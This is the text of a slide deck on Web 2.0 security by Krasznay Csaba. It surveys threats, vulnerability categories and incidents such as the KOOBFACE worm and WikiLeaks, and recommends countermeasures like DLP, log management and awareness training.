security o n web 2.0
DESCRIPTION
Security o n Web 2.0. Krasznay Csaba. Google Search Trends. Press Trends. Media Image of Web 2.0. gossip. malware. deface. child porn. death. lynching. data breach. data retention. phishing. anti-privacy. What really is Web 2.0?. Risk Assessment. Web 2.0 threats. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/1.jpg)
Security on Web 2.0
Krasznay Csaba
![Page 2: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/2.jpg)
Google Search Trends
![Page 3: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/3.jpg)
Press Trends
![Page 4: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/4.jpg)
malware
deface
data breach
gossip
phishing
deathlynching
anti-privacy
child porn
data retention
Media Image of Web 2.0
![Page 5: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/5.jpg)
What really is Web 2.0?
![Page 6: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/6.jpg)
Threats exploit Vulnerabilities
causeIncidentsdamage
Assets have Impacts
onOwner
Risk Assessment
![Page 7: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/7.jpg)
• Hacker attack• Malware
infection• Data loss• No traces• Copyright
violation• Software errors• Data leaks
• Infection and downtime
• Data leaks• Legal prosecution• Productivity loss • Resource waste• Reputation
damage
• Botnets• Financial losses• Identity theft• Harassment• Age verification
threats• Spam• Hiding of origin• Resource
consumption• Information fraud• Inaccuracies of
data
Web 2.0 threats
![Page 8: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/8.jpg)
• Injection Attacks• Cross-Site scripting• Cross-Domain Attacks• Malicious scripts• Framework vulnerabilities
• Access, Authentication, Authorisation
• Development Process Issues
• Knowledge and Information Management vulnerabilities
• End-user Related problems
• General Software and Scripting Vulnerabilities
Web 2.0 vulnerabilities
![Page 9: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/9.jpg)
Target: the Person• Think about Cyber-bullying and
cyber-stalking• Threats: Identity theft, Harassment,
Age verification threats• Vulnerabilities: Access,
Authentication, Authorization; End-user Related problems
• Incident:the story of Megan Meier • And think about what happened
with Lori Drew…• Asset: Private information, personal
reputation, Physical security• Impact: lethal…
![Page 10: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/10.jpg)
Target: the Company• Think about the Twitter account
hacks• Threats: Identity theft,
Harassment, Spam, Information fraud
• Vulnerabilities: : Access, Authentication, Authorization; Knowledge and Information Management vulnerabilities
• Incident: celebrity Twitter hacks • Asset: Corporate and personal
reputation, Corporate secrets• Impact: high
![Page 11: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/11.jpg)
Target: the Country• Think about WikiLeaks• Threat: Data leak• Vulnerabilities: Access,
Authentication, Authorisation; Development Process Issues; Knowledge and Information Management vulnerabilities; End-user Related problems; General Software and Scripting Vulnerabilities
• Incident: Afghan War Diary• Impact: high (maybe lethal?)
![Page 12: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/12.jpg)
Target: the Computer• Think about the Web 2.0 worms• Threats: Botnets, Financial
losses, Identity theft, Spam, Hiding of origin, Resource consumption
• Vulnerabilities: Access, Authentication, Authorisation; Development Process Issues; End-user Related problems; General Software and Scripting Vulnerabilities
• Incident: the KOOBFACE worm• Impact: high
![Page 13: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/13.jpg)
Conclusions
• Nothing has changed in our behavior for centuries, but we have new tools and broader audience
• Web 2.0 services are generally more secure in traditional technical aspect than other type of web services, but preventive controls are not enough
• We have to deal with the problem between the keyboard and the chair…
![Page 14: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/14.jpg)
Maslow's hierarchy of needs
• Web 2.0 realizes three layers of human needs
• So people needs safety and security – but maybe we didn’t realize it yet
• If Web 2.0 can be lethal, do we also need the physiological layer?
![Page 15: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/15.jpg)
Countermeasures• Technical countermeasures:
– Preventive controls focusing on information (DLP)– Detective controls (log management)– Secure applications (WAF, application controls)
• Administrative countermeasures– New security policy approach– New legal background– Broad awareness training– Communication, communication, communication
• Mathematical countermeasures– The more information we have the less value they have
![Page 16: Security o n Web 2.0](https://reader035.vdocuments.site/reader035/viewer/2022081517/56816515550346895dd79472/html5/thumbnails/16.jpg)
THANK YOU!
E-mail: [email protected]: www.krasznay.huFacebook: http://www.facebook.com/krasznay.csabaTwitter: http://twitter.com/csabika25